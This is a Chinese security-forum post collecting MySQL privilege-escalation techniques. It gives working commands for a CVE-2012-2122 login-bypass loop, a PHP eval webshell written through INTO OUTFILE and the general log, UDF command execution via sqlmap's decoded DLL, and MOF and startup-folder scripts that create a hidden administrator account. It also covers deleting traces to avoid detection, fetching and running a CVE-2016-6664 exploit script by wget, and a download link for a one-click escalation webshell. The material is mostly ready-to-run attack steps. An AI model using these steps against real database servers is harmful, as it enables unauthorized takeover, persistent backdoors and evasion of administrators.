安全矩阵

 找回密码
 立即注册
搜索
查看: 2506|回复: 0

MySQL提权总结(建议收藏)

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-9-13 21:03:16 | 显示全部楼层 |阅读模式
原文链接:MySQL提权总结(建议收藏)

前言
数据库权限

在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下:
  1. MySQL 3306 端口弱口令爆破
  2. sqlmap 注入的 --sql-shell 模式
  3. 网站的数据库配置文件中拿到明文密码信息
  4. CVE-2012-2122 等这类漏洞直接拿下 MySQL 权限
复制代码


口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经老生常谈了,这里主要演示一下CVE-2012-2122
CVE-2012-2122
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
#受影响版本
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
在vunlub中启动CVE-2012-2122环境

环境启动后用docker ps查看进程

可以看到启动了一个Mysql服务(版本:5.5.23),监听端口为3306端口,默认的root用户的密码为123456
我们可以使用mysql客户端进行远程连接数据库

连接测试就证明我们的环境正常搭建。然后就是漏洞利用了,正常模拟攻击者,我们是没有密码,不知道root的密码为123456的,这个时候我们就可以利用CVE-2012-2122来进行身份绕过
msf可以导出hash值
  1. msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
  2. msf6 > set rhosts 192.168.178.128
  3. msf6 > run
复制代码


或者直接bash输入
  1. root@root:~/桌面# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.178.128 2>/dev/null; done
  2. Welcome to the MariaDB monitor.  Commands end with ; or \g.
  3. Your MySQL connection id is 854
  4. Server version: 5.5.23 Source distribution

  5. Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

  6. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

  7. MySQL [(none)]>
复制代码


MySQL提权
Webshell权限

into oufile 写 shell
into oufile 写 shell要满足如下条件才可以写入
  1. 1、知道网站物理路径
  2. 2、高权限数据库用户
  3. 3、load_file() 开启 即 secure_file_priv 无限制
  4. 4、网站路径有写入权限
复制代码


数据库查看是否有secure_file_priv限制
  1. mysql> show global variables like '%secure_file_priv%';
  2. +------------------+-------+
  3. | Variable_name    | Value |
  4. +------------------+-------+
  5. | secure_file_priv | NULL  |
  6. +------------------+-------+
复制代码


[td]
Value说明
NULL不允许导入或导出
/只允许在 / 目录导入导出
不限制目录
在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件
在 MySQL 5.5之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件
利用phpmyadmin来into outfile
首先在存在phpmyadmin时,我们可以试试弱口令,root、root来进行登录phpmyadmin后台。登录进去后我们获取网站的绝对路径来进行写shell
在phpmyadmin中,我们可以利用log变量来猜测网站的绝对路径

这里是用phpstudy搭建的网站,所以猜测网站目录在WWW目录下,或者通过其他手段的信息收集,来收集到我们的网站绝对路径。
有了网站路径,我们就可以执行SQL命令来进行写shell

  写入失败,这里失败的原因是因为我们前面查询secure_file_priv值为null,所以权限就是不允许导入或导出,这里我们对secure_file_priv进行修改为空后,再进行写入。
因为secure_file_priv为只读权限,所以我们打开my.ini文件,加入如下语句再重启服务器。
secure_file_priv=''这时查看权限为所有目录下可写入

再次写入shell,会发现成功写入。

然后菜刀、蚁剑进行连接。

当然我么还可以利用sqlmap进行文件的写入,如下:

sqlmap -u "http://x.x.x.x/?id=x" --file-write="c:/Users/suifeng/Desktop/shell.php" --file-dest="C:/phpstudy_pro/WWW/shell.php"
当然这种写shell的方式,在MySQL 5.5之后已经很难实现了,因为MySQL 5.5之后值为NULL,在secure_file_priv没有导入导出权限的时候,我们还可以利用日志写shell。
利用日志写shell
在MySQL 5.0 版本以上会创建日志文件,我们可以通过修改日志的全局变量中的存储位置来 getshell
  1. mysql> SHOW VARIABLES LIKE '%general%';
  2. +------------------+-----------------------------------------------------------------+
  3. | Variable_name    | Value                                                           |
  4. +------------------+-----------------------------------------------------------------+
  5. | general_log      | OFF                                                             |
  6. | general_log_file | C:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-1G2NI5V.log |
  7. +------------------+-----------------------------------------------------------------+
复制代码

general_log 默认关闭,高权限的用户可以直接通过mysql命令行进行开启,开启后日志文件记录用户的每条指令,将其保存在general_log _file中。我们可以通过开启general_log ,然后自定义general_log _file来进行getshell。
  1. mysql> set global general_log = "ON";   #开启general_log
  2. mysql> set global general_log_file='c:/phpstudy_pro/www/shell.php';   #修改general_log_file路径

复制代码

再次查看权限
  1. #写入shell
  2. mysql> select "<?php @eval($_POST['suifeng']);?>";
  3. +-----------------------------------+
  4. | <?php @eval($_POST['suifeng']);?> |
  5. +-----------------------------------+
  6. | <?php @eval($_POST['suifeng']);?> |
  7. +-----------------------------------+
复制代码

然后蚁剑连接

服务器权限UDF提权
什么是UDF
UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用一些系统函数如version()函数便捷。
动态链接库
提权大致方法是把我们的动态链接库放置在特点的目录下,创建我们自定义函数,实现系统函数命令的调用,最终导致提权。
在mysql<5.1  导出目录c:/windows或system32
在mysql>=5.1  导出安装目录/lib/plugin/
在有注入点时候,我们可以通过sqlmap中里的UDF动态链接库进行导入
#sqlmap中动态链接库位置
D:\tools\sqlmap\data\udf\mysql里面有windows和linux且64位和32位版本,大家可以根据被攻击器来进行选择

sqlmap中的动态链接库为了防止被杀毒软件查杀,都经过了编码处理,不能直接使用,所以我们还需要用sqlmap自带的解码工具clock.py进行解码
​​
  1. #cloak位置
  2. D:\tools\sqlmap\extra\cloak
  3. #解码操作
  4. D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll  #windows解码

  5. D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\linux\64\lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so  #linux解码
复制代码



动态链接库上传位置
在上传动态链接库之前,我们要先对mysql的版本进行判断
  1. #判断数据库版本
  2. mysql> select version();
  3. +-----------+
  4. | version() |
  5. +-----------+
  6. | 5.7.26    |
  7. +-----------+
复制代码

这里被攻击的靶机版本为5.7.26,所以我们要把动态链接库上传到安装目录/lib/plugin/下面,那我们可以利用如下命令查找安装目录
  1. mysql> show variables like '%plugin%';
  2. +-------------------------------+----------------------------------------------------+
  3. | Variable_name                 | Value                                              |
  4. +-------------------------------+----------------------------------------------------+
  5. | default_authentication_plugin | mysql_native_password                              |
  6. | plugin_dir                    | C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\ |
  7. +-------------------------------+----------------------------------------------------+


  8. mysql> select @@basedir;
  9. +-----------------------------------------+
  10. | @@basedir |
  11. +-----------------------------------------+
  12. | C:\phpstudy_pro\Extensions\MySQL5.7.26\ |
  13. +-----------------------------------------+
复制代码



来到对应的目录下并没有发现/lib/plugin,所以我们需要自己创建一个/lib/plugin,但是真实环境下我们服务器权限还没有拿下(这里用是为了观察直观),所以我们可以在webshell环境下或者通过NTFS ADS流创建文件夹。
#NTFS ADS流创建语句
mysql> select 'x' into dumpfile 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin:INDEX_ALLOCATION';  #创建不一定成功,不成功的情况下还是利用webshell的权限创建目录​创建好后我们就可以导入我们的动态链接库了。
导入动态链接库
存在sql注入时
在存在sql注入的时候,我们可以通过sqlmap来上传动态链接库,但是需要满足的条件为secure_file_priv的值为空,sql注入为最高权限,又因为 GET 有字节长度限制,所以往往 POST 注入才可以执行这种攻击。

python sqlmap.py -u "http://192.168.178.130/sqli-labs/Less-1/?id=1" --file-write="d:/tools/sqlmap/extra/cloak/lib_mysqludf_sys_64.dll" --file-dest="C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll"
不存在sql注入时
没有sql注入时,我们可以通过执行sql语句来进行写入动态链接库,这里需要写入文件,所以需要secure_file_priv为空。
#select后面为动态链接库的十六进制编码(数据太长,这里省略显示)
SELECT 0x4d5a900003... INTO DUMPFILE 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll';动态链接库的十六进制可以通过mysql自带的hex函数或者一些文件十六进制编码器工具解决。当然在sql语句写不进去的动态链接库的时候,我们还可以通过我们的webshell来进行上传。
文件上传完成后

我们就可以通过sql语句来自定义函数了
  1. #原本执行代码
  2. CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';
  3. #修改后执行代码
  4. CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
复制代码

本来应该执行这条命令来自定义命令的,但是一直报错,后来我把dll文件名字修改之后,创建成功。(可能是下划线导致函数在编译情况下出问题)
  1. #查询自定义函数
  2. mysql> select * from mysql.func;
  3. +----------+-----+---------+----------+
  4. | name     | ret | dl      | type     |
  5. +----------+-----+---------+----------+
  6. | sys_eval |   0 | udf.dll | function |
  7. +----------+-----+---------+----------+
复制代码

#创建成功后,我们利用自定义函数进行命令执行
mysql > select sys_eval('whoami');
然后用我们这个自定义命令执行函数进行提权即可。最后为了权限维持,防止被发现,我们可以对自定义函数进行删除。
#删除自定义函数
mysql> drop function sys_eval;这种手工UDF提权无疑太过繁琐,这里主要推荐通过网页版一键提权脚本,这里使用的是月师傅的马,下面是下载地址
链接:https://pan.baidu.com/s/1a5ASE2TLvnKsOUxsHKBjOw
提取码:v9s9上传后访问

然后再导入,执行命令即可



MOF提权
现在通过mof文件来进行提权已经非常困难了,因为它支持提权版本只有2003和一些之前的版本。mof的提权原理为mof文件每五秒就会执行,而且是系统权限,我们通过mysql使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次我们上传的MOF。MOF当中有一段是vbs脚本,我们可以通过控制这段vbs脚本的内容让系统执行命令,进行提权。
mof脚本如下
  1. #pragma namespace("\\\\.\\root\\subscription")

  2. instance of __EventFilter as $EventFilter
  3. {
  4.     EventNamespace = "Root\\Cimv2";
  5.     Name  = "filtP2";
  6.     Query = "Select * From __InstanceModificationEvent "
  7.             "Where TargetInstance Isa "Win32_LocalTime" "
  8.             "And TargetInstance.Second = 5";
  9.     QueryLanguage = "WQL";
  10. };

  11. instance of ActiveScriptEventConsumer as $Consumer
  12. {
  13.     Name = "consPCSV2";
  14.     ScriptingEngine = "JScript";
  15.     ScriptText =
  16. "var WSH = new ActiveXObject("WScript.Shell")\nWSH.run("net.exe user suifeng p@ssw0rd /add")\nWSH.run("net.exe localgroup administrators suifeng /add")";   #创建用户
  17. };

  18. instance of __FilterToConsumerBinding
  19. {
  20.     Consumer   = $Consumer;
  21.     Filter = $EventFilter;
  22. };
复制代码


首先我们将我们的脚本上传,然后用如下命令上传到指定目录。

select load_file("C:/Documents and Settings/suifeng.mof") into dumpfile "c:/windows/system32/wbem/mof/suifeng.mof";
然后等待五秒后用net user命令可以看到创建的用户

mof提权痕迹清理
因为每隔几秒钟时间又会重新执行添加用户的命令,所以想要清理痕迹得先暂时关闭 winmgmt 服务再删除相关 mof 文件
  1. #停止winmgmt服务
  2. net stop winmgmt
  3. #删除Repository文件夹
  4. rmdir /s /q C:\Windows\system32\wbem\Repository\
  5. #重新启动服务
  6. net start winmgmt
复制代码


启动项提权
MySQL的启动项提权,原理就是通过mysql把一段vbs脚本导入到系统的启动项下,如果管理员启动或者重启的服务器,那么该脚本就会被调用,并执行vbs脚本里面的命令。
以下是启动项路径
  1. #2003
  2. C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
  3. C:\Documents and Settings\All Users\Start Menu\Programs\Startup
  4. #2008
  5. C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  6. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
复制代码

有了路径我们在mysql的shell下输入如下代码

  1. create table a (cmd text);
  2. insert into a values ("set wshshell=createobject (""wscript.shell"") " );
  3. insert into a values ("a=wshshell.run (""cmd.exe /c net user suifeng p@ssw0rd /add"",0) " );
  4. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators suifeng /add"",0) " );
  5. select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";


复制代码



然后我们在对应路径下就可以看到我们的vbs脚本了

然后重启,即可发现vbs脚本里面创建的用户。

CVE-2016-6663、CVE-2016-6664组合提权
在一些Mysql小于5.5.51或小于5.6.32或小于5.7.14及衍生版本,我们都可以利用CVE-2016-6663、CVE-2016-6664组合对其进行测试提权。
1、利用CVE-2016-6663将www-data权限提升为mysql权限:
  1. cd /var/www/html/
  2. gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
  3. ./mysql-privesc-race test 123456 localhost testdb
复制代码


2、利用CVE-2016-6664将Mysql权限提升为root权限:
  1. wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
  2. chmod 777 mysql-chowned.sh
  3. ./mysql-chowned.sh /var/log/mysql/error.log
复制代码



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 16:43 , Processed in 0.016349 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表